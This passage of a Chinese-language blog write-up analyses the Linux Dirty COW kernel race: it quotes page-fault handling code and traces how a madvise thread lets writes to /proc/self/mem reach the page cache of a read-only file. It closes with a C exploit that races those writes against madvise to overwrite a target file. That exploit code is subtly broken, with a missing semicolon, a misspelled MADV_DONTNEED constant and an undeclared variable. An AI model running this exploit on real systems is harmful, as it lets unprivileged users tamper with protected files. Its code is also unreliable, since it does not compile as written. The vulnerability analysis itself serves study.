        fault_flags |= FAULT_FLAG_REMOTE;
    if (nonblocking)
        fault_flags |= FAULT_FLAG_ALLOW_RETRY;
    if (*flags & FOLL_NOWAIT)
        fault_flags |= FAULT_FLAG_ALLOW_RETRY | FAULT_FLAG_RETRY_NOWAIT;
    if (*flags & FOLL_TRIED) {
        VM_WARN_ON_ONCE(fault_flags & FAULT_FLAG_ALLOW_RETRY);
        fault_flags |= FAULT_FLAG_TRIED;
    }

    ret = handle_mm_fault(mm, vma, address, fault_flags); // 缺页处理
    if (ret & VM_FAULT_ERROR) {
        if (ret & VM_FAULT_OOM)
            return -ENOMEM;
        if (ret & (VM_FAULT_HWPOISON | VM_FAULT_HWPOISON_LARGE))
            return *flags & FOLL_HWPOISON ? -EHWPOISON : -EFAULT;
        if (ret & (VM_FAULT_SIGBUS | VM_FAULT_SIGSEGV))
            return -EFAULT;
        BUG();
    }

    if (tsk) {
        if (ret & VM_FAULT_MAJOR)
            tsk->maj_flt++;
        else
            tsk->min_flt++;
    }

    if (ret & VM_FAULT_RETRY) {
        if (nonblocking)
            *nonblocking = 0;
        return -EBUSY;
    }

    /*
     * The VM_FAULT_WRITE bit tells us that do_wp_page has broken COW when
     * necessary, even if maybe_mkwrite decided not to set pte_write. We
     * can thus safely do subsequent page lookups as if they were reads.
     * But only do so when looping for pte_write is futile: in some cases
     * userspace may also be wanting to write to the gotten user page,
     * which a read fault here might prevent (a readonly page might get
     * reCOWed by userspace write).
     */
    if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE)) //第二次缺页异常会走到这里，清除 FOLL_WRITE 标志位
        *flags &= ~FOLL_WRITE;
    return 0;
}

第一次触发缺页异常

第一次调用 follow_page_mask 时，由于页表项和页表为空，所以其返回 NULL，从而进入 faultin_page 进行缺页处理。最后会调用到 do_cow_fault 这个函数，该函数会返回0，所以会再次执行follow_page_mask

第二次触发缺页异常

由于我们对该页并无写权限，所以follow_page_mask 依旧会返回 NULL ，再次触发缺页异常，于是我们再次进入 faultin_page 函数进行处理。这一次会成功获取到了一个可写的内存页，此时 faultin_page 函数会清除 foll_flags 的 FOLL_WRITE 标志位

接下来的流程最终回到 __get_user_pages 的 retry 标签，第三次尝试获取内存页，此时 foll_flags 的 FOLL_WRITE 标志位已经被清除，内核认为是一个读操作，于是 follow_page_mask 函数成功获取到该内存页，接下来便是常规的写入流程， COW 结束

漏洞分析

在上述写/proc/self/mem时，整个流程大致如下：

/*
mem_rw
    __get_free_page
    ......
    __access_remote_vm
        ......
        __get_user_pages
            follow_page_mask ==> 调度内存页
            faultin_page ==> 处理缺页异常
                handle_mm_fault ==> 这里就是我们上面分析的缺页异常处理的流程了
*/

第二次调用 follow_page_mask 时，此时页表的映射，pte等都已经填充好了，可以看上面的do_cow_fault分析。但是这里页表标志位只可读，而我们要写，所以会再次返回NULL，然后再次进入 faultin_page 进行缺页处理。最后会调用到 do_wp_page 这个函数，这时会重用 do_cow_fault 分配的内存页，并清除 foll_flags 的 FOLL_WRITE 标志位

第三次调用 follow_page_mask 时，此时 FoLL_WRITE 标志位已经被清除，相当于一个读请求，所以会取回该内存页，那么用户在进行写的时候就不好同步到磁盘

但是如果在第2次与第3次之间，有另外一个线程使用madvise(addr, len, MADV_DONTNEED) 去告诉内核该页面不在使用，那么在第3次时，会再次进入 follow_page_mask->faultin_page->follow_page_mask，这里会返回 page_cache 页面

正常调用流程大致如下：

/*
follow_page_mask()        // 页未映射，进行 faultin_page 处理
    👇
faultin_page()            // 最后调用到 do_cow_fault，即创建一个匿名页（此时并未开始写入）
    👇
follow_page_mask()        // 由于访问属性 flags 中有 FOLL_WRITE标志，而匿名页面只读；权限不匹配，进行 faultin_page 处理
    👇
faultin_page()            // 最后调用到 do_wp_page，重用上述匿名页，并删除 flags 中的 FOLL_WRITE 标志
    👇        
follow_page_mask()        // 没有 FOLL_WRITE 标志后，权限检查通过，成功获取到匿名页面 page
    👇
返回上一级函数 👉 kmap，进行数据的写入，此时写入针对的是匿名页 page，不会影响 page_cache 中的数据
*/

dirtycow 调用流程：

/*
follow_page_mask()        // 页未映射，进行 faultin_page 处理
    👇
faultin_page()            // 最后调用到 do_cow_fault，即创建一个匿名页（此时并未开始写入）
    👇
follow_page_mask()        // 由于访问属性 flags 中有 FOLL_WRITE标志，而匿名页面只读；权限不匹配，进行 faultin_page 处理
    👇
faultin_page()            // 最后调用到 do_wp_page，重用上述匿名页，并删除 flags 中的 FOLL_WRITE 标志
    👇👉👉👉👉👉 // race，madvise 告诉内核上述匿名页已经被释放，即页表项等已经被清除
follow_page_mask()        // 所以这里会再次发现：页未映射，进行 faultin_page 处理，但是 flags 中已没有 FOLL_WRITE 标志
    👇
faultin_page()            // 由于没有 FOLL_WRITE 标志，所以被当作一次读操作，所以会直接将 page_cache 进行映射
    👇
follow_page_mask()        // 成功返回 page_cache 页面
    👇
返回上一级函数 👉 kmap，进行数据的写入，这里就导致直接写 page_cache 了，所以最后会修改磁盘文件内容
*/

漏洞利用

这个漏洞比较老了，似乎都打上补丁了，我试了好几个内核版本都不行，这里记录一个 exp 吧。

#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <pthread.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>

void* map;

void useage()
{
    puts("useage: ./exp dest_file dirty_data")
    exit(-1);
}

void write_func(void* args)
{
    int fd = open("/proc/self/mem", O_RDWR);
    for (int i = 0; i < 0x100000; i++)
    {
        lseek(fd, (off_t)map, SEEK_SET);
        write(fd, args, strlen(args));
    }
}

void madvise_func(void* args)
{
    for (int i = 0; i < 0x100000; i++)
    {
        madvise(map, 0x100, MADV_DONOTNEED);
    }
}

int main(int argc, char** argv, char** env)
{
    if (argc < 3) useage();
    pthread_t write_thr, madvise_thr;
    int dest_fd;
    dest_fd = open(argv[1], O_RDONLY);
    fstat(dest_fd,&dest_st);
    map = mmap(NULL, dest_st.st_size, PROT_READ, MAP_PRIVATE, dest_fd, 0);

    pthread_create(&madvise_thr, NULL, madvise_func, NULL);
    pthread_create(&write_thr, NULL, write_func, argv[2]);

    pthread_join(write_thr, NULL);
    pthread_join(madvise_thr, NULL);
    return 0;
}